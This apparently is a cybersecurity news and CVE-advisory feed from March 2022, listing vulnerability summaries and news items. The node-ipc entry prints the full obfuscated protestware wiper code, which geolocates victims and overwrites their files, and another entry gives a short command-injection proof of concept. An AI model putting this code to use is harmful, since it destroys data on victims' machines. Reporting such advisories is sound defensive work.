16 March 2022
?
14:45
πŸ›‘ Cybersecurity & Privacy news πŸ›‘
πŸ›  OpenSSL Toolkit 3.0.2 πŸ› 

OpenSSL is a robust, fully featured Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols with full-strength cryptography world-wide. The 3.x series is the current major version of OpenSSL.

πŸ“– Read

via "Packet Storm Security".
14:55
❌ β€˜CryptoRom’ Crypto-Scam is Back via Side-Loaded Apps ❌

Scammers are bypassing Apple's App Store security, stealing thousands of dollars’ worth of cryptocurrency from the unwitting, using the TestFlight and WebClips programs.

πŸ“– Read

via "Threat Post".
?
15:20
πŸ›‘ Cybersecurity & Privacy news πŸ›‘
β€Ό CVE-2021-23648 β€Ό

The package @braintree/sanitize-url before 6.0.0 are vulnerable to Cross-site Scripting (XSS) due to improper sanitization in sanitizeUrl function.

πŸ“– Read

via "National Vulnerability Database".
15:20
β€Ό CVE-2022-21164 β€Ό

The package node-lmdb before 0.9.7 are vulnerable to Denial of Service (DoS) when defining a non-invokable ToString value, which will cause a crash during type check.

πŸ“– Read

via "National Vulnerability Database".
15:20
β€Ό CVE-2022-23812 β€Ό

This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don't run it! js import u from "path"; import a from "fs"; import o from "https"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString("utf8"), function (t) { t.on("data", function (t) { const n = Buffer.from("Li8=", "base64"); const o = Buffer.from("Li4v", "base64"); const r = Buffer.from("Li4vLi4v", "base64"); const f = Buffer.from("Lw==", "base64"); const c = Buffer.from("Y291bnRyeV9uYW1l", "base64"); const e = Buffer.from("cnVzc2lh", "base64"); const i = Buffer.from("YmVsYXJ1cw==", "base64"); try { const s = JSON.parse(t.toString("utf8")); const u = s[c.toString("utf8")].toLowerCase(); const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus if (a) { h(n.toString("utf8")); h(o.toString("utf8")); h(r.toString("utf8")); h(f.toString("utf8")); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = "", o = "") { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from("4p2k77iP", "base64"); for (var e = 0; e < r.length; e++) { const i = u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? f.push(...s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with ?? } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl };

πŸ“– Read

via "National Vulnerability Database".
15:20
β€Ό CVE-2021-45822 β€Ό

A cross-site scripting vulnerability is present in Xbtit 3.1. The stored XSS vulnerability occurs because /ajaxchat/sendChatData.php does not properly validate the value of the "n" (POST) parameter. Through this vulnerability, an attacker is capable to execute malicious JavaScript code.

πŸ“– Read

via "National Vulnerability Database".
15:20
β€Ό CVE-2022-24729 β€Ό

CKEditor4 is an open source what-you-see-is-what-you-get HTML editor. CKEditor4 prior to version 4.18.0 contains a vulnerability in the `dialog` plugin. The vulnerability allows abuse of a dialog input validator regular expression, which can cause a significant performance drop resulting in a browser tab freeze. A patch is available in version 4.18.0. There are currently no known workarounds.

πŸ“– Read

via "National Vulnerability Database".
15:20
β€Ό CVE-2022-24728 β€Ό

CKEditor4 is an open source what-you-see-is-what-you-get HTML editor. A vulnerability has been discovered in the core HTML processing module and may affect all plugins used by CKEditor 4 prior to version 4.18.0. The vulnerability allows someone to inject malformed HTML bypassing content sanitization, which could result in executing JavaScript code. This problem has been patched in version 4.18.0. There are currently no known workarounds.

πŸ“– Read

via "National Vulnerability Database".
?
18:36
πŸ›‘ Cybersecurity & Privacy news πŸ›‘
πŸ•΄ Microsoft the No. 1 Most-Spoofed Brand in Phishing Attacks πŸ•΄

New Barracuda Networks data shows attackers sent some 3 million emails from around 12,000 pilfered accounts.

πŸ“– Read

via "Dark Reading".
18:36
πŸ•΄ What the Newly Signed US Cyber-Incident Law Means for Security πŸ•΄

Bipartisan cybersecurity legislation comes amid increased worries over ransomware, and fears of cyberattacks from Russia in the wake of its invasion of Ukraine.

πŸ“– Read

via "Dark Reading".
?
19:20
πŸ›‘ Cybersecurity & Privacy news πŸ›‘
β€Ό CVE-2022-26295 β€Ό

A stored cross-site scripting (XSS) vulnerability in /ptms/?page=user of Online Project Time Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the user name field.

πŸ“– Read

via "National Vulnerability Database".
19:20
β€Ό CVE-2022-26293 β€Ό

Online Project Time Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter in the function save_employee at /ptms/classes/Users.php.

πŸ“– Read

via "National Vulnerability Database".
?
19:36
πŸ›‘ Cybersecurity & Privacy news πŸ›‘
πŸ•΄ 4 Critical Capabilities for a SaaS Security Posture Management (SSPM) Solution πŸ•΄

The need for deep visibility and remediation for SaaS security settings is critical. If you're considering a SaaS Security Posture Management solution, here’s a checklist of what to look for.

πŸ“– Read

via "Dark Reading".
?
20:12
πŸ›‘ Cybersecurity & Privacy news πŸ›‘
πŸ•΄ How Pen Testing Gains Critical Security Buy-in and Defense Insight πŸ•΄

It's more important than ever for companies to challenge their defenses, learning about new gaps and opportunities for improvement along the way.

πŸ“– Read

via "Dark Reading".
20:12
πŸ•΄ TAC Security Survey Reveals: 88% of Businesses Rely on Manual Processes to Identify Network Vulnerabilities πŸ•΄



πŸ“– Read

via "Dark Reading".
17 March 2022
?
07:21
πŸ›‘ Cybersecurity & Privacy news πŸ›‘
β€Ό CVE-2022-24075 β€Ό

Whale browser before 3.12.129.18 allowed extensions to replace JavaScript files of the HWP viewer website which could access to local HWP files. When the HWP files were opened, the replaced script could read the files.

πŸ“– Read

via "National Vulnerability Database".
07:21
β€Ό CVE-2022-24074 β€Ό

Whale Bridge, a default extension in Whale browser before 3.12.129.18, allowed to receive any SendMessage request from the content script itself that could lead to controlling Whale Bridge if the rendering process compromises.

πŸ“– Read

via "National Vulnerability Database".
07:21
β€Ό CVE-2022-24073 β€Ό

The Web Request API in Whale browser before 3.12.129.18 allowed to deny access to the extension store or redirect to any URL when users access the store.

πŸ“– Read

via "National Vulnerability Database".
07:21
β€Ό CVE-2022-24072 β€Ό

The devtools API in Whale browser before 3.12.129.18 allowed extension developers to inject arbitrary JavaScript into the extension store web page via devtools.inspectedWindow, leading to extensions downloading and uploading when users open the developer tool.

πŸ“– Read

via "National Vulnerability Database".
?
09:26
πŸ›‘ Cybersecurity & Privacy news πŸ›‘
β€Ό CVE-2022-1000 β€Ό

Path Traversal in GitHub repository prasathmani/tinyfilemanager prior to 2.4.7.

πŸ“– Read

via "National Vulnerability Database".
09:26
β€Ό CVE-2021-45791 β€Ό

Slims8 Akasia 8.3.1 is affected by SQL injection in /admin/modules/bibliography/index.php, /admin/modules/membership/member_type.php, /admin/modules/system/user_group.php, and /admin/modules/membership/index.php through the dir parameter. It can be used by remotely authenticated librarian users.

πŸ“– Read

via "National Vulnerability Database".
09:26
β€Ό CVE-2021-45792 β€Ό

Slims9 Bulian 9.4.2 is affected by Cross Site Scripting (XSS) in /admin/modules/system/custom_field.php.

πŸ“– Read

via "National Vulnerability Database".
09:32
πŸ•΄ Enhancing DLP With Natural Language Understanding for Better Email Security πŸ•΄

Natural language understanding is well-suited for scanning enterprise email to detect and filter out spam and other malicious content. Armorblox introduces a data loss prevention service to its email security platform using NLU.

πŸ“– Read

via "Dark Reading".
?
10:00
πŸ›‘ Cybersecurity & Privacy news πŸ›‘
πŸ—“οΈ β€˜Fox guarding the henhouse’ – Founder of cyber-fraud prevention company pleads guilty to defrauding investors πŸ—“οΈ

Adam Rogas has been charged with using fraudulent financial data to secure more than $100m in funding

πŸ“– Read

via "The Daily Swig".
10:00
πŸ“’ Germany advises against using Kaspersky software due to hacking risk πŸ“’

The Moscow-headquartered cyber security company has a history of being targeted for its alleged links to the Russian state

πŸ“– Read

via "ITPro".
10:00
πŸ“’ NortonLifeLock and Avast merger could reduce competition, CMA warns πŸ“’

The watchdog will launch a phase two investigation into the merger unless NortonLifeLock and Avast address its concerns within five days

πŸ“– Read

via "ITPro".
10:00
πŸ“’ NSW ditches e-voting system for 2023 election πŸ“’

The electoral commissioner has suggested there should be a review of internet voting following the problems with the system found last December

πŸ“– Read

via "ITPro".
?
10:28
πŸ›‘ Cybersecurity & Privacy news πŸ›‘
⚠ CISA warning: β€œRussian actors bypassed 2FA” – what happened and how to avoid it ⚠

Don't leave old accounts lying around where someone sketchy could reactivate them.

πŸ“– Read

via "Naked Security".
10:28
⚠ Beware bogus Betas – cryptocoin scammers abuse Apple’s TestFlight system ⚠

"Install this moneymaking app" - this one is so special that it isn't available on Google Play or the App Store!

πŸ“– Read

via "Naked Security".
?
11:02
πŸ›‘ Cybersecurity & Privacy news πŸ›‘
⚠ S3 Ep74: Cybercrime busts, Apple patches, Pi Day, and disconnect effects [Podcast] ⚠

Latest episode - listen now!

πŸ“– Read

via "Naked Security".
11:02
πŸ•΄ Cut Down on Alert Overload and Leverage Layered Security Measures πŸ•΄

Feeling overwhelmed by the number of alerts? It doesn't have to be that way.

πŸ“– Read

via "Dark Reading".
?
11:21
πŸ›‘ Cybersecurity & Privacy news πŸ›‘
β€Ό CVE-2022-24761 β€Ό

Waitress is a Web Server Gateway Interface server for Python 2 and 3. When using Waitress versions 2.1.0 and prior behind a proxy that does not properly validate the incoming HTTP request matches the RFC7230 standard, Waitress and the frontend proxy may disagree on where one request starts and where it ends. This would allow requests to be smuggled via the front-end proxy to waitress and later behavior. There are two classes of vulnerability that may lead to request smuggling that are addressed by this advisory: The use of Python's `int()` to parse strings into integers, leading to `+10` to be parsed as `10`, or `0x01` to be parsed as `1`, where as the standard specifies that the string should contain only digits or hex digits; and Waitress does not support chunk extensions, however it was discarding them without validating that they did not contain illegal characters. This vulnerability has been patched in Waitress 2.1.1. A workaround is available. When deploying a proxy in front of waitress, turning on any and all functionality to make sure that the request matches the RFC7230 standard. Certain proxy servers may not have this functionality though and users are encouraged to upgrade to the latest version of waitress instead.

πŸ“– Read

via "National Vulnerability Database".
11:21
β€Ό CVE-2021-23632 β€Ό

All versions of package git are vulnerable to Remote Code Execution (RCE) due to missing sanitization in the Git.git method, which allows execution of OS commands rather than just git commands. Steps to Reproduce 1. Create a file named exploit.js with the following content: js var Git = require("git").Git; var repo = new Git("repo-test"); var user_input = "version; date"; repo.git(user_input, function(err, result) { console.log(result); }) 2. In the same directory as exploit.js, run npm install git. 3. Run exploit.js: node exploit.js. You should see the outputs of both the git version and date command-lines. Note that the repo-test Git repository does not need to be present to make this PoC work.

πŸ“– Read

via "National Vulnerability Database".
11:21
β€Ό CVE-2021-44260 β€Ό

A vulnerability is in the 'live_mfg.html' page of the WAVLINK AC1200, version WAVLINK-A42W-1.27.6-20180418, which can allow a remote attacker to access this page without any authentication. When processed, it exposes some key information of the manager of router.

πŸ“– Read

via "National Vulnerability Database".
11:21
β€Ό CVE-2021-44908 β€Ό

SailsJS Sails.js <=1.4.0 is vulnerable to Prototype Pollution via controller/load-action-modules.js, function loadActionModules().

πŸ“– Read

via "National Vulnerability Database".
11:21
β€Ό CVE-2021-44261 β€Ό

A vulnerability is in the 'BRS_top.html' page of the Netgear W104, version WAC104-V1.0.4.13, which can allow a remote attacker to access this page without any authentication. When processed, it exposes firmware version information for the device.

πŸ“– Read

via "National Vulnerability Database".
11:21
β€Ό CVE-2021-44262 β€Ό

A vulnerability is in the 'MNU_top.htm' page of the Netgear W104, version WAC104-V1.0.4.13, which can allow a remote attacker to access this page without any authentication. When processed, it exposes some key information for the device.

πŸ“– Read

via "National Vulnerability Database".
11:21
β€Ό CVE-2022-25352 β€Ό

The package libnested before 1.5.2 are vulnerable to Prototype Pollution via the set function in index.js. **Note:** This vulnerability derives from an incomplete fix for [CVE-2020-28283](https://security.snyk.io/vuln/SNYK-JS-LIBNESTED-1054930)

πŸ“– Read

via "National Vulnerability Database".
11:21
β€Ό CVE-2022-21221 β€Ό

The package github.com/valyala/fasthttp before 1.34.0 are vulnerable to Directory Traversal via the ServeFile function, due to improper sanitization. It is possible to be exploited by using a backslash %5c character in the path. **Note:** This security issue impacts Windows users only.

πŸ“– Read

via "National Vulnerability Database".
11:21
β€Ό CVE-2022-25760 β€Ό

All versions of package accesslog are vulnerable to Arbitrary Code Injection due to the usage of the Function constructor without input sanitization. If (attacker-controlled) user input is given to the format option of the package's exported constructor function, it is possible for an attacker to execute arbitrary JavaScript code on the host that this package is being run on.

πŸ“– Read

via "National Vulnerability Database".
11:21
β€Ό CVE-2022-25296 β€Ό

The package bodymen from 0.0.0 are vulnerable to Prototype Pollution via the handler function which could be tricked into adding or modifying properties of Object.prototype using a __proto__ payload. **Note:** This vulnerability derives from an incomplete fix to [CVE-2019-10792](https://security.snyk.io/vuln/SNYK-JS-BODYMEN-548897)

πŸ“– Read

via "National Vulnerability Database".
11:21
β€Ό CVE-2021-45793 β€Ό

Slims9 Bulian 9.4.2 is affected by SQL injection in lib/comment.inc.php. User data can be obtained.

πŸ“– Read

via "National Vulnerability Database".
11:21
β€Ό CVE-2022-0748 β€Ό

The package post-loader from 0.0.0 are vulnerable to Arbitrary Code Execution which uses a markdown parser in an unsafe way so that any javascript code inside the markdown input files gets evaluated and executed.

πŸ“– Read

via "National Vulnerability Database".
11:21
β€Ό CVE-2021-44259 β€Ό

A vulnerability is in the 'wx.html' page of the WAVLINK AC1200, version WAVLINK-A42W-1.27.6-20180418, which can allow a remote attacker to access this page without any authentication. When an unauthorized user accesses this page directly, it connects to this device as a friend of the device owner.

πŸ“– Read

via "National Vulnerability Database".
11:21
β€Ό CVE-2022-25354 β€Ό

The package set-in before 2.0.3 are vulnerable to Prototype Pollution via the setIn method, as it allows an attacker to merge object prototypes into it. **Note:** This vulnerability derives from an incomplete fix of [CVE-2020-28273](https://security.snyk.io/vuln/SNYK-JS-SETIN-1048049)

πŸ“– Read

via "National Vulnerability Database".
11:21
β€Ό CVE-2021-45794 β€Ό

Slims9 Bulian 9.4.2 is affected by SQL injection in /admin/modules/system/backup.php. User data can be obtained.

πŸ“– Read

via "National Vulnerability Database".
11:21
β€Ό CVE-2021-23556 β€Ό

The package guake before 3.8.5 are vulnerable to Exposed Dangerous Method or Function due to the exposure of execute_command and execute_command_by_uuid methods via the d-bus interface, which makes it possible for a malicious user to run an arbitrary command via the d-bus method. **Note:** Exploitation requires the user to have installed another malicious program that will be able to send dbus signals or run terminal commands.

πŸ“– Read

via "National Vulnerability Database".
11:27
β€Ό CVE-2022-0749 β€Ό

This affects all versions of package SinGooCMS.Utility. The socket client in the package can pass in the payload via the user-controllable input after it has been established, because this socket client transmission does not have the appropriate restrictions or type bindings for the BinaryFormatter.

πŸ“– Read

via "National Vulnerability Database".
11:27
β€Ό CVE-2021-23771 β€Ό

This affects all versions of package notevil; all versions of package argencoders-notevil. It is vulnerable to Sandbox Escape leading to Prototype pollution. The package fails to restrict access to the main context, allowing an attacker to add or modify an object's prototype. **Note:** This vulnerability derives from an incomplete fix in [SNYK-JS-NOTEVIL-608878](https://security.snyk.io/vuln/SNYK-JS-NOTEVIL-608878).

πŸ“– Read

via "National Vulnerability Database".
11:27
❌ Reporting Mandates to Clear Up Feds’ Hazy Look into Threat Landscape – Podcast ❌

It’s about time, AttackIQ’s Jonathan Reiber said about 24H/72H report deadlines mandated in the new spending bill. As it is, visibility into adversary behavior has been muck.

πŸ“– Read

via "Threat Post".
?
11:57
πŸ›‘ Cybersecurity & Privacy news πŸ›‘
❌ Misconfigured Firebase Databases Exposing Data in Mobile Apps ❌

Five percent of the databases are vulnerable to threat actors: It's a gold mine of exploit opportunity in thousands of mobile apps, researchers say.

πŸ“– Read

via "Threat Post".
12:09
πŸ—“οΈ Downdetector: How the popular site outage tracker is helping to improve web security πŸ—“οΈ

β€˜Minutes matter, and being able to get that additional feed can give infosec teams the edge’

πŸ“– Read

via "The Daily Swig".
?
14:02
πŸ›‘ Cybersecurity & Privacy news πŸ›‘
πŸ•΄ Stopping Russian Cyberattacks at Their Source πŸ•΄

Step up training with cybersecurity drills, teach how to avoid social engineering traps, share open source monitoring tools, and make multifactor authentication the default.

πŸ“– Read

via "Dark Reading".
?
15:26
πŸ›‘ Cybersecurity & Privacy news πŸ›‘
β€Ό CVE-2021-44906 β€Ό

Minimist <=1.2.5 is vulnerable to Prototype Pollution via file index.js, function setKey() (lines 69-95).

πŸ“– Read

via "National Vulnerability Database".
15:26
β€Ό CVE-2022-25364 β€Ό

In Gradle Enterprise before 2021.4.2, the default built-in build cache configuration allowed anonymous write access. If this was not manually changed, a malicious actor with network access to the build cache could potentially populate it with manipulated entries that execute malicious code as part of a build. As of 2021.4.2, the built-in build cache is inaccessible-by-default, requiring explicit configuration of its access-control settings before it can be used. (Remote build cache nodes are unaffected as they are inaccessible-by-default.)

πŸ“– Read

via "National Vulnerability Database".
15:26
β€Ό CVE-2022-26503 β€Ό

Deserialization of untrusted data in Veeam Agent for Windows 2.0, 2.1, 2.2, 3.0.2, 4.x, and 5.x allows local users to run arbitrary code with local system privileges.

πŸ“– Read

via "National Vulnerability Database".
15:26
β€Ό CVE-2022-24759 β€Ό

`@chainsafe/libp2p-noise` contains TypeScript implementation of noise protocol, an encryption protocol used in libp2p. `@chainsafe/libp2p-noise` before 4.1.2 and 5.0.3 does not correctly validate signatures during the handshake process. This may allow a man-in-the-middle to pose as other peers and get those peers banned. Users should upgrade to version 4.1.2 or 5.0.3 to receive a patch. There are currently no known workarounds.

πŸ“– Read

via "National Vulnerability Database".
15:26
β€Ό CVE-2020-15591 β€Ό

fexsrv in F*EX (aka Frams' Fast File EXchange) before fex-20160919_2 allows eval injection (for unauthenticated remote code execution).

πŸ“– Read

via "National Vulnerability Database".
15:26
β€Ό CVE-2022-26526 β€Ό

Anaconda Anaconda3 through 2021.11.0.0 and Miniconda3 through 11.0.0.0 can create a world-writable directory under %PROGRAMDATA% and place that directory into the system PATH environment variable. Thus, for example, local users can gain privileges by placing a Trojan horse file into that directory. (This problem can only happen in a non-default installation. The person who installs the product must specify that it is being installed for all users. Also, the person who installs the product must specify that the system PATH should be changed.)

πŸ“– Read

via "National Vulnerability Database".
15:36
πŸ” Configuration Essential to MFA Enforcement πŸ”

Organizations should enforce MFA for all users but avoid default MFA protocols that can be abused to steal sensitive data.

πŸ“– Read

via "".
?
16:27
πŸ›‘ Cybersecurity & Privacy news πŸ›‘
❌ Dev Sabotages Popular NPM Package to Protest Russian Invasion ❌

In the latest software supply-chain attack, the code maintainer added malicious code to the hugely popular node-ipc library to replace files with a heart emoji and a peacenotwar module.

πŸ“– Read

via "Threat Post".
16:32
πŸ•΄ Titaniam Announces Completion of Product Suite πŸ•΄

The Titaniam Suite includes ransomware and extortion defense capabilities in the form of five products.

πŸ“– Read

via "Dark Reading".
16:32
πŸ•΄ Cloudflare Announces API Gateway πŸ•΄

Organizations can secure, manage, and monitor all of their APIs in one easy-to-use dashboard.

πŸ“– Read

via "Dark Reading".
16:32
πŸ•΄ Glasswall Launches Freemium Version of its Desktop Content Disarm and Reconstruction App πŸ•΄

Glasswall technology offers proactive protection from file-based cybersecurity threats.

πŸ“– Read

via "Dark Reading".
?
17:02
πŸ›‘ Cybersecurity & Privacy news πŸ›‘
πŸ•΄ Nok Nok Labs Unveils S3 Authentication Suite πŸ•΄

Enhancements include support for OpenID Connect as an integration mechanism.

πŸ“– Read

via "Dark Reading".
17:02
πŸ•΄ Firefly Announces Release of ValidIaC Open Source Solution πŸ•΄



πŸ“– Read

via "Dark Reading".
?
17:26
πŸ›‘ Cybersecurity & Privacy news πŸ›‘
β€Ό CVE-2022-26511 β€Ό

WPS Presentation 11.8.0.5745 insecurely load d3dx9_41.dll when opening .pps files('current directory type' DLL loading).

πŸ“– Read

via "National Vulnerability Database".
17:26
β€Ό CVE-2022-26081 β€Ό

The installer of WPS Office Version 10.8.0.5745 insecurely load shcore.dll, allowing an attacker to execute arbitrary code with the privilege of the user invoking the installer.

πŸ“– Read

via "National Vulnerability Database".
17:26
β€Ό CVE-2022-25949 β€Ό

The kernel mode driver kwatch3 of KINGSOFT Internet Security 9 Plus Version 2010.06.23.247 fails to properly handle crafted inputs, leading to stack-based buffer overflow.

πŸ“– Read

via "National Vulnerability Database".
17:26
β€Ό CVE-2022-25969 β€Ό

The installer of WPS Office Version 10.8.0.6186 insecurely load VERSION.DLL (or some other DLLs), allowing an attacker to execute arbitrary code with the privilege of the user invoking the installer.

πŸ“– Read

via "National Vulnerability Database".
?
19:21
πŸ›‘ Cybersecurity & Privacy news πŸ›‘
πŸ•΄ ThreatMapper Updated With New Scanning Tools πŸ•΄

ThreatMapper 1.3.0 features secret scanning and the ability to enumerate a software bill of materials (SBOM) at runtime to help secure serverless, Kubernetes, container and multi-cloud environments.

πŸ“– Read

via "Dark Reading".
19:21
β€Ό CVE-2021-44907 β€Ό

A Denial of Service vulnerability exists in qs up to 6.8.0 due to insufficient sanitization of property in the gs.parse function. The merge() function allows the assignment of properties on an array in the query. For any property being assigned, a value in the array is converted to an object containing these properties. Essentially, this means that the property whose expected type is Array always has to be checked with Array.isArray() by the user. This may not be obvious to the user and can cause unexpected behavior.

πŸ“– Read

via "National Vulnerability Database".
19:21
β€Ό CVE-2022-26500 β€Ό

Improper limitation of path names in Veeam Backup & Replication 9.5U3, 9.5U4,10.x, and 11.x allows remote authenticated users access to internal API functions that allows attackers to upload and execute arbitrary code.

πŸ“– Read

via "National Vulnerability Database".
19:21
β€Ό CVE-2022-26504 β€Ό

Improper authentication in Veeam Backup & Replication 9.5U3, 9.5U4,10.x and 11.x component used for Microsoft System Center Virtual Machine Manager (SCVMM) allows attackers execute arbitrary code via Veeam.Backup.PSManager.exe

πŸ“– Read

via "National Vulnerability Database".
19:21
β€Ό CVE-2022-26501 β€Ό

Veeam Backup & Replication 10.x and 11.x has Incorrect Access Control (issue 1 of 2).

πŸ“– Read

via "National Vulnerability Database".
19:26
β€Ό CVE-2021-46107 β€Ό

Ligeo Archives Ligeo Basics as of 02_01-2022 is vulnerable to Server Side Request Forgery (SSRF) which allows an attacker to read any documents via the download features.

πŸ“– Read

via "National Vulnerability Database".
19:26
β€Ό CVE-2021-45040 β€Ό

The Spatie media-library-pro library through 1.17.10 and 2.x through 2.1.6 for Laravel allows remote attackers to upload executable files via the uploads route.

πŸ“– Read

via "National Vulnerability Database".
19:26
β€Ό CVE-2022-21822 β€Ό

NVIDIA FLARE contains a vulnerability in the admin interface, where an un-authorized attacker can cause Allocation of Resources Without Limits or Throttling, which may lead to cause system unavailable.

πŸ“– Read

via "National Vulnerability Database".
19:26
β€Ό CVE-2022-24770 β€Ό

`gradio` is an open source framework for building interactive machine learning models and demos. Prior to version 2.8.11, `gradio` suffers from Improper Neutralization of Formula Elements in a CSV File. The `gradio` library has a flagging functionality which saves input/output data into a CSV file on the developer's computer. This can allow a user to save arbitrary text into the CSV file, such as commands. If a program like MS Excel opens such a file, then it automatically runs these commands, which could lead to arbitrary commands running on the user's computer. The problem has been patched as of `2.8.11`, which escapes the saved csv with single quotes. As a workaround, avoid opening csv files generated by `gradio` with Excel or similar spreadsheet programs.

πŸ“– Read

via "National Vulnerability Database".
?
19:48
πŸ›‘ Cybersecurity & Privacy news πŸ›‘
β™ŸοΈ Pro-Ukraine β€˜Protestware’ Pushes Antiwar Ads, Geo-Targeted Malware β™ŸοΈ

Researchers are tracking a number of open-source "protestware" projects on GitHub that have recently altered their code to display "Stand with Ukraine" messages for users, or basic facts about the carnage in Ukraine. The group also is tracking several code packages that were recently modified to erase files on computers that appear to be coming from Russian or Belarusian Internet addresses.

πŸ“– Read

via "Krebs on Security".
20:02
πŸ•΄ 6 Reasons Not to Pay Ransomware Attackers πŸ•΄

Paying a ransom might appear to be the best option, but it comes with its own costs.

πŸ“– Read

via "Dark Reading".
?
21:21
πŸ›‘ Cybersecurity & Privacy news πŸ›‘
β€Ό CVE-2022-24302 β€Ό

In Paramiko before 2.10.1, a race condition (between creation and chmod) in the write_private_key_file function could allow unauthorized information disclosure.

πŸ“– Read

via "National Vulnerability Database".
21:21
β€Ό CVE-2022-0758 β€Ό

Rapid7 Nexpose versions 6.6.129 and earlier suffer from a reflected cross site scripting vulnerability, within the shared scan configuration component of the tool. With this vulnerability an attacker could pass literal values as the test credentials, providing the opportunity for a potential XSS attack. This issue is fixed in Rapid7 Nexpose version 6.6.130.

πŸ“– Read

via "National Vulnerability Database".
21:21
β€Ό CVE-2021-44088 β€Ό

An SQL Injection vulnerability exists in Sourcecodester Attendance and Payroll System v1.0 which allows a remote attacker to bypass authentication via unsanitized login parameters.

πŸ“– Read

via "National Vulnerability Database".
21:21
β€Ό CVE-2021-44087 β€Ό

A Remote Code Execution (RCE) vulnerability exists in Sourcecodester Attendance and Payroll System v1.0 which allows an unauthenticated remote attacker to upload a maliciously crafted PHP via photo upload.

πŸ“– Read

via "National Vulnerability Database".
21:21
β€Ό CVE-2022-0237 β€Ό

Rapid7 Insight Agent versions 3.1.2.38 and earlier suffer from a privilege escalation vulnerability, whereby an attacker can hijack the flow of execution due to an unquoted argument to the runas.exe command used by the ir_agent.exe component, resulting in elevated rights and persistent access to the machine. This issue was fixed in Rapid7 Insight Agent version 3.1.3.80.

πŸ“– Read

via "National Vulnerability Database".
21:22
β€Ό CVE-2022-0757 β€Ό

Rapid7 Nexpose versions 6.6.93 and earlier are susceptible to an SQL Injection vulnerability, whereby valid search operators are not defined. This lack of validation can allow an attacker to manipulate the "ANY" and "OR" operators in the SearchCriteria and inject SQL code. This issue was fixed in Rapid7 Nexpose version 6.6.129.

πŸ“– Read

via "National Vulnerability Database".
21:22
β€Ό CVE-2021-43961 β€Ό

Sonatype Nexus Repository Manager 3.36.0 allows HTML Injection.

πŸ“– Read

via "National Vulnerability Database".
18 March 2022
?
07:22
πŸ›‘ Cybersecurity & Privacy news πŸ›‘
β€Ό CVE-2022-26965 β€Ό

In Pluck 4.7.16, an admin user can use the theme upload functionality at /admin.php?action=themeinstall to perform remote code execution.

πŸ“– Read

via "National Vulnerability Database".
07:22
β€Ό CVE-2022-27240 β€Ό

scheme/webauthn.c in Glewlwyd SSO server 2.x before 2.6.2 has a buffer overflow associated with a webauthn assertion.

πŸ“– Read

via "National Vulnerability Database".
07:22
β€Ό CVE-2021-45966 β€Ό

An issue was discovered in Pascom Cloud Phone System before 7.20.x. In the management REST API, /services/apply in exd.pl allows remote attackers to execute arbitrary code via shell metacharacters.

πŸ“– Read

via "National Vulnerability Database".
07:22
β€Ό CVE-2021-45967 β€Ό

An issue was discovered in Pascom Cloud Phone System before 7.20.x. A configuration error between NGINX and a backend Tomcat server leads to a path traversal in the Tomcat server, exposing unintended endpoints.

πŸ“– Read

via "National Vulnerability Database".
07:22
β€Ό CVE-2021-45868 β€Ό

In the Linux kernel before 5.15.3, fs/quota/quota_tree.c does not validate the block number in the quota tree (on disk). This can, for example, lead to a kernel/locking/rwsem.c use-after-free if there is a corrupted quota file.

πŸ“– Read

via "National Vulnerability Database".
07:22
β€Ό CVE-2021-45968 β€Ό

An issue was discovered in xmppserver jar in the XMPP Server component of the JIve platform, as used in Pascom Cloud Phone System before 7.20.x (and in other products). An endpoint in the backend Tomcat server of the Pascom allows SSRF, a related issue to CVE-2019-18394.

πŸ“– Read

via "National Vulnerability Database".
07:22
β€Ό CVE-2022-27191 β€Ό

golang.org/x/crypto/ssh before 0.0.0-20220314234659-1baeb1ce4c0b in Go through 1.16.15 and 1.17.x through 1.17.8 allows an attacker to crash a server in certain circumstances involving AddHostKey.

πŸ“– Read

via "National Vulnerability Database".
?
09:22
πŸ›‘ Cybersecurity & Privacy news πŸ›‘
β€Ό CVE-2021-22571 β€Ό

A local attacker could read files from some other users' SA360 reports stored in the /tmp folder during staging process before the files are loaded in BigQuery. We recommend upgrading to version 1.0.3 or above.

πŸ“– Read

via "National Vulnerability Database".
09:22
β€Ό CVE-2021-45834 β€Ό

An attacker can upload or transfer files of dangerous types to the OpenDocMan 1.4.4 portal via add.php using MIME-bypass, which may be automatically processed within the product's environment or lead to arbitrary code execution.

πŸ“– Read

via "National Vulnerability Database".
09:22
β€Ό CVE-2021-45835 β€Ό

The Online Admission System 1.0 allows an unauthenticated attacker to upload or transfer files of dangerous types to the application through documents.php, which may be used to execute malicious code or lead to code execution.

πŸ“– Read

via "National Vulnerability Database".
09:22
β€Ό CVE-2022-24655 β€Ό

A stack overflow vulnerability exists in the upnpd service in Netgear EX6100v1 201.0.2.28, CAX80 2.1.2.6, and DC112A 1.0.0.62, which may lead to the execution of arbitrary code without authentication.

πŸ“– Read

via "National Vulnerability Database".
?
11:13
πŸ›‘ Cybersecurity & Privacy news πŸ›‘
πŸ•΄ The Road Ahead for Cyber and Infrastructure Security πŸ•΄

Despite cost, it's time to focus on securing legacy systems and physical infrastructure along with digital systems.

πŸ“– Read

via "Dark Reading".
11:22
β€Ό CVE-2022-24595 β€Ό

